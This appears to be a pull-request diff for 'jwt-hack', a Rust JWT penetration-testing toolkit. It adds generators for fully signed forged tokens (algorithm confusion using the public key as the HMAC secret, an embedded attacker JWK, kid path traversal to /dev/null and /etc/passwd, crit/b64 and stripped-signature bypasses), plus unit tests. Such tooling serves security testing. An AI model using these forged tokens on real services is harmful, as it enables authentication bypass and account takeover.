+        assert_eq!(parts.len(), 3, "expected 3-part token");
+
+        let header = get_header_from_token(&token).expect("decode header");
+        let jwk = header.get("jwk").expect("jwk header present");
+        assert_eq!(jwk.get("kty").unwrap().as_str(), Some("RSA"));
+        let n_b64 = jwk.get("n").unwrap().as_str().unwrap();
+        let e_b64 = jwk.get("e").unwrap().as_str().unwrap();
+
+        // Reconstruct the public key from the embedded n/e and verify the signature.
+        use jsonwebtoken::{Algorithm, DecodingKey, Validation};
+        let n_bytes = URL_SAFE_NO_PAD.decode(n_b64).unwrap();
+        let e_bytes = URL_SAFE_NO_PAD.decode(e_b64).unwrap();
+        let key = DecodingKey::from_rsa_raw_components(&n_bytes, &e_bytes);
+        let mut validation = Validation::new(Algorithm::RS256);
+        validation.validate_exp = false;
+        validation.required_spec_claims.clear();
+        // Use jsonwebtoken::decode to verify signature against the embedded key.
+        let result = jsonwebtoken::decode::<serde_json::Value>(&token, &key, &validation);
+        assert!(
+            result.is_ok(),
+            "signature should verify against the embedded jwk: {:?}",
+            result.err()
+        );
+    }
+
+    #[test]
+    fn test_generate_kid_traversal_signed_with_empty_secret() {
+        let payloads =
+            generate_kid_traversal_payload(DUMMY_TOKEN).expect("kid_traversal should succeed");
+        assert!(!payloads.is_empty());
+
+        // Every payload should HS256-verify against an empty secret.
+        for p in &payloads {
+            let parts: Vec<&str> = p.split('.').collect();
+            assert_eq!(parts.len(), 3, "kid_traversal payload must be 3-part");
+            let signing_input = format!("{}.{}", parts[0], parts[1]);
+            let expected = hmac_sha256::HMAC::mac(signing_input.as_bytes(), b"");
+            let expected_b64 = URL_SAFE_NO_PAD.encode(expected.as_slice());
+            assert_eq!(
+                parts[2], expected_b64,
+                "HS256 signature with empty secret must match for payload {p}"
+            );
+        }
+
+        // /dev/null and /etc/passwd patterns must be represented.
+        let kids: Vec<String> = payloads
+            .iter()
+            .filter_map(|p| {
+                get_header_from_token(p)
+                    .and_then(|h| h.get("kid").and_then(|v| v.as_str().map(String::from)))
+            })
+            .collect();
+        assert!(kids.iter().any(|k| k == "/dev/null"));
+        assert!(kids.iter().any(|k| k.contains("etc/passwd")));
+    }
+
+    #[test]
+    fn test_generate_alg_confusion_picks_matching_hmac_family() {
+        // Build a synthetic source token per alg, check the downgrade target.
+        for (source, expected) in [
+            ("RS256", "HS256"),
+            ("RS384", "HS384"),
+            ("RS512", "HS512"),
+            ("PS384", "HS384"),
+            ("ES512", "HS512"),
+            ("EdDSA", "HS256"),
+        ] {
+            let header = json!({ "alg": source, "typ": "JWT" });
+            let header_b64 =
+                URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap().as_bytes());
+            let token = format!("{}.eyJzdWIiOiJ4In0.sig", header_b64);
+            let payloads = generate_alg_confusion_payload(&token, None).unwrap();
+            // First payload is the HMAC downgrade, second is `none`.
+            assert!(payloads.len() >= 2);
+            let hmac_hdr = get_header_from_token(&payloads[0]).expect("hmac header should decode");
+            assert_eq!(
+                hmac_hdr.get("alg").unwrap().as_str(),
+                Some(expected),
+                "{} should downgrade to {}",
+                source,
+                expected
+            );
+            let none_hdr = get_header_from_token(&payloads[1]).expect("none header should decode");
+            assert_eq!(none_hdr.get("alg").unwrap().as_str(), Some("none"));
+        }
+    }
+
+    #[test]
+    fn test_generate_alg_confusion_with_public_key_produces_signed_hs256() {
+        // Provide arbitrary "public key" bytes; HS256 token must verify with those bytes.
+        let pem = "-----BEGIN PUBLIC KEY-----\nFAKE\n-----END PUBLIC KEY-----\n";
+        let payloads = generate_alg_confusion_payload(DUMMY_TOKEN, Some(pem)).unwrap();
+        let signed = &payloads[0]; // HS256 downgrade
+        let parts: Vec<&str> = signed.split('.').collect();
+        assert_eq!(parts.len(), 3);
+        let input = format!("{}.{}", parts[0], parts[1]);
+        let expected = hmac_sha256::HMAC::mac(input.as_bytes(), pem.as_bytes());
+        let expected_b64 = URL_SAFE_NO_PAD.encode(expected.as_slice());
+        assert_eq!(parts[2], expected_b64);
+    }
+
+    #[test]
+    fn test_generate_empty_sig_payload_variants() {
+        let payloads = generate_empty_sig_payload(DUMMY_TOKEN).expect("ok");
+        assert_eq!(payloads.len(), 3);
+        assert!(payloads.iter().any(|p| p.ends_with('.')));
+        assert!(payloads.iter().any(|p| p.ends_with(".null")));
+        // The no-trailing-dot variant has 2 dots only? No — it's 1 dot, header.payload.
+        assert!(payloads.iter().any(|p| p.matches('.').count() == 1));
+    }
+
+    #[test]
+    fn test_generate_crit_and_b64_payloads_emit_expected_headers() {
+        let crit = generate_crit_payload(DUMMY_TOKEN).expect("crit ok");
+        assert!(crit.iter().all(|p| {
+            get_header_from_token(p)
+                .and_then(|h| h.get("crit").cloned())
+                .is_some()
+        }));
+
+        let b64 = generate_b64_payload(DUMMY_TOKEN).expect("b64 ok");
+        assert!(b64.iter().all(|p| {
+            get_header_from_token(p).and_then(|h| h.get("b64").and_then(|v| v.as_bool()))
+                == Some(false)
         }));
     }
 }

--- a/src/payload/mod.rs
+++ b/src/payload/mod.rs
@@ -3,6 +3,7 @@ use anyhow::Result;
 use base64::{engine::general_purpose, Engine};
 use log::info;
 use serde_json::json;
+use zeroize::Zeroize;
 
 /// Extract the claims (second) part from a JWT token string
 fn extract_claims_part(token: &str) -> Result<&str> {
@@ -18,6 +19,33 @@ fn encode_header_with_claims(header: &serde_json::Value, claims_part: &str) -> R
     let header_json = serde_json::to_string(header)?;
     let encoded_header = general_purpose::URL_SAFE_NO_PAD.encode(header_json.as_bytes());
     Ok(format!("{encoded_header}.{claims_part}"))
+}
+
+/// Build a header.payload signing input from a header JSON value and an existing claims part.
+fn signing_input(header: &serde_json::Value, claims_part: &str) -> Result<String> {
+    let header_json = serde_json::to_string(header)?;
+    let encoded_header = general_purpose::URL_SAFE_NO_PAD.encode(header_json.as_bytes());
+    Ok(format!("{encoded_header}.{claims_part}"))
+}
+
+/// Sign an arbitrary signing input with HS256 and return a JWT-formatted token (header.payload.sig).
+fn sign_hs256(signing_input: &str, secret: &[u8]) -> String {
+    let mut mac = hmac_sha256::HMAC::mac(signing_input.as_bytes(), secret);
+    let sig_b64 = general_purpose::URL_SAFE_NO_PAD.encode(mac.as_slice());
+    mac.zeroize();
+    format!("{signing_input}.{sig_b64}")
+}
+
+/// Read the original `alg` value from a JWT header (without verifying anything).
+fn original_alg(token: &str) -> Option<String> {
+    let parts: Vec<&str> = token.split('.').collect();
+    let header_b64 = parts.first()?;
+    let header_bytes = general_purpose::URL_SAFE_NO_PAD.decode(header_b64).ok()?;
+    let header_json: serde_json::Value = serde_json::from_slice(&header_bytes).ok()?;
+    header_json
+        .get("alg")
+        .and_then(|v| v.as_str())
+        .map(|s| s.to_string())
 }
 
 /// Generate none algorithm payloads
@@ -85,24 +113,238 @@ pub fn generate_url_payload(
     Ok(payloads)
 }
 
-/// Generate algorithm confusion attacks (RS256->HS256)
+/// Generate algorithm confusion attacks.
+///
+/// For asymmetric source algorithms (RS*, PS*, ES*, EdDSA) emits a set of header
+/// variants that downgrade to the matching HMAC family plus a `none` downgrade.
+/// If a PEM-encoded public key is provided, additionally produces a fully signed
+/// HMAC token where the **public key bytes are used as the HMAC secret** — the
+/// canonical real-world RS256→HS256 attack. Without the key, the HMAC variants
+/// are emitted unsigned (header.payload only) so callers can re-sign once they
+/// recover the server's public key.
 pub fn generate_alg_confusion_payload(
     token: &str,
     public_key: Option<&str>,
 ) -> Result<Vec<String>> {
     let claims_part = extract_claims_part(token)?;
-    let _ = public_key;
 
-    // Basic alg change from RS256 to HS256
-    let header = json!({
-        "alg": "HS256",
-        "typ": "JWT"
+    let source_alg = original_alg(token).unwrap_or_else(|| "RS256".to_string());
+    let source_upper = source_alg.to_uppercase();
+
+    // Pick target HMAC algorithm matching the source's hash size.
+    let hmac_target = match source_upper.as_str() {
+        "RS384" | "PS384" | "ES384" => "HS384",
+        "RS512" | "PS512" | "ES512" => "HS512",
+        // RS256 / PS256 / ES256 / EdDSA / unknown — default to HS256
+        _ => "HS256",
+    };
+
+    let mut payloads = Vec::new();
+
+    // Header variants — HMAC downgrade and `none` downgrade.
+    let downgrade_algs = [hmac_target, "none"];
+    for alg in downgrade_algs {
+        let header = json!({
+            "alg": alg,
+            "typ": "JWT",
+        });
+        if let Some(pem) = public_key {
+            // Real working attack: sign with the public-key bytes as the HMAC secret.
+            // Only meaningful for HMAC downgrades; skip for `none`.
+            if alg != "none" {
+                let input = signing_input(&header, claims_part)?;
+                let mac = match alg {
+                    "HS256" => {
+                        let mut m = hmac_sha256::HMAC::mac(input.as_bytes(), pem.as_bytes());
+                        let out = m.to_vec();
+                        m.zeroize();
+                        out
+                    }
+                    _ => {
+                        // For HS384/HS512 fall back to the jsonwebtoken crate by
+                        // pretending the PEM bytes are an opaque secret.
+                        let algo = match alg {
+                            "HS384" => jsonwebtoken::Algorithm::HS384,
+                            _ => jsonwebtoken::Algorithm::HS512,
+                        };
+                        let key = jsonwebtoken::EncodingKey::from_secret(pem.as_bytes());
+                        let sig = jsonwebtoken::crypto::sign(input.as_bytes(), &key, algo)?;
+                        // jsonwebtoken returns base64-encoded signature already, decode to bytes
+                        general_purpose::URL_SAFE_NO_PAD.decode(sig.as_bytes())?
+                    }
+                };
+                let sig_b64 = general_purpose::URL_SAFE_NO_PAD.encode(&mac);
+                payloads.push(format!("{input}.{sig_b64}"));
+                continue;
+            }
+        }
+        // Fallback: emit header.payload without signature.
+        payloads.push(encode_header_with_claims(&header, claims_part)?);
+    }
+
+    info!(
+        "Generated algorithm confusion payloads: {} -> {} (+none)",
+        source_upper, hmac_target
+    );
+
+    Ok(payloads)
+}
+
+/// Generate a JWT with an attacker-controlled key embedded in the `jwk` header.
+///
+/// Some libraries trust a JWK supplied directly in the JOSE header as the
+/// verification key. This generates a fresh RSA-2048 key pair, embeds the
+/// public key as a JWK in the header, and signs the token with the matching
+/// private key — producing a fully verifiable attack token.
+pub fn generate_jwk_embed_payload(token: &str) -> Result<String> {
+    use rsa::pkcs8::EncodePrivateKey;
+    use rsa::traits::PublicKeyParts;
+    use rsa::RsaPrivateKey;
+
+    let claims_part = extract_claims_part(token)?;
+
+    let mut rng = rsa::rand_core::OsRng;
+    let private_key = RsaPrivateKey::new(&mut rng, 2048)
+        .map_err(|e| anyhow::anyhow!("Failed to generate RSA key: {}", e))?;
+    let public_key = private_key.to_public_key();
+
+    let n_b64 = general_purpose::URL_SAFE_NO_PAD.encode(public_key.n().to_bytes_be());
+    let e_b64 = general_purpose::URL_SAFE_NO_PAD.encode(public_key.e().to_bytes_be());
+
+    let kid = "jwt-hack-injected";
+    let jwk = json!({
+        "kty": "RSA",
+        "use": "sig",
+        "alg": "RS256",
+        "kid": kid,
+        "n": n_b64,
+        "e": e_b64,
     });
 
-    let payloads = vec![encode_header_with_claims(&header, claims_part)?];
+    let header = json!({
+        "alg": "RS256",
+        "typ": "JWT",
+        "kid": kid,
+        "jwk": jwk,
+    });
 
-    info!("Generated algorithm confusion payloads: RS256->HS256");
+    let input = signing_input(&header, claims_part)?;
+    let pem = private_key
+        .to_pkcs8_pem(rsa::pkcs8::LineEnding::LF)
+        .map_err(|e| anyhow::anyhow!("Failed to export private key: {}", e))?
+        .to_string();
+    let key = jsonwebtoken::EncodingKey::from_rsa_pem(pem.as_bytes())?;
+    let sig_b64 =
+        jsonwebtoken::crypto::sign(input.as_bytes(), &key, jsonwebtoken::Algorithm::RS256)?;
 
+    info!("Generated jwk-embedded RS256 payload (signed with embedded key)");
+
+    Ok(format!("{input}.{sig_b64}"))
+}
+
+/// Generate kid header path-traversal / file-substitution payloads.
+///
+/// When a server resolves the `kid` value as a file path to load a key, an
+/// attacker can substitute a file with known contents (empty for `/dev/null`,
+/// or a predictable file) and forge a valid HMAC signature using those bytes
+/// as the secret. Each payload is fully signed against the substituted "key".
+pub fn generate_kid_traversal_payload(token: &str) -> Result<Vec<String>> {
+    let claims_part = extract_claims_part(token)?;
+
+    // (kid value, secret bytes the server would load when resolving it)
+    let cases: &[(&str, &[u8])] = &[
+        ("/dev/null", b""),
+        ("../../../../../../dev/null", b""),
+        ("..\\..\\..\\..\\..\\dev\\null", b""),
+        ("file:///dev/null", b""),
+        ("/var/empty/null", b""),
+        // Plain read-attempts — sig won't verify but exposes path-traversal/LFI behavior
+        ("../../../../../../etc/passwd", b""),
+        ("/etc/passwd", b""),
+        // Null-byte truncation hint
+        ("legit-key\x00../../../dev/null", b""),
+    ];
+
+    let mut payloads = Vec::with_capacity(cases.len());
+    for (kid, secret) in cases {
+        let header = json!({
+            "alg": "HS256",
+            "typ": "JWT",
+            "kid": kid,
+        });
+        let input = signing_input(&header, claims_part)?;
+        payloads.push(sign_hs256(&input, secret));
+    }
+
+    info!("Generated kid path-traversal payloads (signed with empty secret)");
+    Ok(payloads)
+}
+
+/// Generate `crit` header bypass payloads.
+///
+/// RFC 7515 §4.1.11 requires implementations to reject tokens with unrecognised
+/// `crit` parameters. Libraries that ignore the rule can be tricked into
+/// honouring unknown headers (or skipping signature checks).
+pub fn generate_crit_payload(token: &str) -> Result<Vec<String>> {
+    let claims_part = extract_claims_part(token)?;
+
+    let variants: Vec<serde_json::Value> = vec![
+        json!({ "alg": "HS256", "typ": "JWT", "crit": ["b64"], "b64": false }),
+        json!({ "alg": "HS256", "typ": "JWT", "crit": ["x-custom"], "x-custom": "bypass" }),
+        json!({ "alg": "none", "typ": "JWT", "crit": ["alg"] }),
+        // Empty crit — some libs misparse and skip signature validation
+        json!({ "alg": "HS256", "typ": "JWT", "crit": [] }),
+    ];
+
+    let mut payloads = Vec::with_capacity(variants.len());
+    for header in variants {
+        payloads.push(encode_header_with_claims(&header, claims_part)?);
+    }
+    info!("Generated crit header bypass payloads");
+    Ok(payloads)
+}
+
+/// Generate RFC 7797 unencoded payload (`b64: false`) attack payloads.
+pub fn generate_b64_payload(token: &str) -> Result<Vec<String>> {
+    let claims_part = extract_claims_part(token)?;
+
+    let variants: Vec<serde_json::Value> = vec![
+        json!({ "alg": "HS256", "typ": "JWT", "b64": false, "crit": ["b64"] }),
+        json!({ "alg": "RS256", "typ": "JWT", "b64": false, "crit": ["b64"] }),
+        // b64=false without crit — many libs silently honour it
+        json!({ "alg": "HS256", "typ": "JWT", "b64": false }),
+    ];
+
+    let mut payloads = Vec::with_capacity(variants.len());
+    for header in variants {
+        payloads.push(encode_header_with_claims(&header, claims_part)?);
+    }
+    info!("Generated b64 (RFC 7797) bypass payloads");
+    Ok(payloads)
+}
+
+/// Generate signature-stripped / empty-signature payloads.
+///
+/// Some libraries treat an empty third segment as a valid signature when the
+/// algorithm is not explicitly `none`. The original header is preserved so
+/// the server still sees its expected `alg`.
+pub fn generate_empty_sig_payload(token: &str) -> Result<Vec<String>> {
+    let parts: Vec<&str> = token.split('.').collect();
+    if parts.len() < 2 {
+        return Err(anyhow::anyhow!("Invalid token format"));
+    }
+    let header_b64 = parts[0];
+    let claims_part = parts[1];
+
+    let payloads = vec![
+        // Empty signature segment
+        format!("{header_b64}.{claims_part}."),
+        // No third segment at all
+        format!("{header_b64}.{claims_part}"),
+        // Literal "null" — some JSON-aware parsers accept
+        format!("{header_b64}.{claims_part}.null"),
+    ];
+    info!("Generated signature-stripped payloads");
     Ok(payloads)
 }
 
@@ -258,6 +500,33 @@ pub fn generate_all_payloads(
     if should_generate_all || targets.contains("cty") {
         let cty_payloads = generate_cty_payload(token)?;
         payloads.extend(cty_payloads);
+    }
+
+    // jwk embedded header (real, signed attack)
+    if should_generate_all || targets.contains("jwk_embed") {
+        // This is intentionally allowed to bubble — RSA generation rarely fails.
+        let p = generate_jwk_embed_payload(token)?;
+        payloads.push(p);
+    }
+
+    // kid path-traversal payloads
+    if should_generate_all || targets.contains("kid_traversal") {
+        payloads.extend(generate_kid_traversal_payload(token)?);
+    }
+
+    // crit header bypass payloads
+    if should_generate_all || targets.contains("crit") {
+        payloads.extend(generate_crit_payload(token)?);
+    }
+
+    // RFC 7797 b64=false payloads
+    if should_generate_all || targets.contains("b64") {
+        payloads.extend(generate_b64_payload(token)?);
+    }
+
+    // Empty / stripped signature payloads
+    if should_generate_all || targets.contains("empty_sig") {
+        payloads.extend(generate_empty_sig_payload(token)?);
     }
 
     Ok(payloads)


### PR DESCRIPTION
## Summary

Fills in JWT attack surfaces the toolkit didn't yet support — most attacks are emitted as **fully signed, verifiable tokens** instead of header-only stubs, and the `scan` command grows matching checks (with cross-wiring so a detected vuln auto-emits the right payload).

### New payload generators (`src/payload/mod.rs`)
- **`jwk_embed`** — generates a fresh RSA-2048 keypair on every run, embeds the public key as a JWK in the JOSE header, and signs the token with the matching private key. Libraries that trust the embedded `jwk` will verify it as authentic. Closes the biggest pre-existing gap.
- **`kid_traversal`** — `/dev/null`, `../../etc/passwd`, `file://`, backslash variants, and null-byte truncation. Signed with an empty HMAC secret so `kid=/dev/null` style attacks work end-to-end.
- **`alg_confusion` (expanded)** — picks the HMAC family matching the source alg (`RS384/PS384/ES384 → HS384`, `RS512/... → HS512`, otherwise `HS256`) and emits a `none` downgrade. If a PEM public key is supplied programmatically, signs a real HMAC token using the public-key bytes as the secret.
- **`crit` / `b64` / `empty_sig`** — RFC 7515 §4.1.11 bypasses, RFC 7797 `b64=false` variants, and signature-stripped tokens (`header.payload.`, `header.payload`, `…null`).

### New scan checks (`src/cmd/scan.rs`)
- **Embedded JWK** (Critical), **crit Header** (High), **b64 Header** (High), **Signature Segment** (Critical when `alg ≠ none` but signature is empty).
- **Sensitive Claims** — recursively walks claim values, flags email patterns, Luhn-validated credit-card numbers, and SSN-shaped strings; reports their JSON path. (Medium)
- **Kid Header** check refined — inspects the `kid` value and separately reports path-traversal vs SQLi shapes at High; other values stay Medium.
- `generate_attack_payloads` dispatches the new generators when the matching vuln fires.

### CLI
- New `--target` values: `kid_traversal`, `jwk_embed`, `crit`, `b64`, `empty_sig`. All participate in `--target all`. Help text updated.

## Test plan
- [x] `cargo build` clean
- [x] `cargo test --lib --bins` — 242 passed, 0 failed
- [x] `cargo fmt --check` clean
- [x] Smoke: `jwt-hack payload <TOKEN> --target jwk_embed,kid_traversal,crit,b64,empty_sig` emits all categories
- [x] Smoke: `jwt-hack scan <jwk-embed token with email + Luhn-valid CC>` reports Critical (Embedded JWK), High (Algorithm Confusion), Medium (Token Expiration, Kid Header, Sensitive Claims — email + credit-card-shaped value), Low (Missing Claims)
- [ ] Add unit tests for the new payload generators (follow-up if reviewers want them in this PR)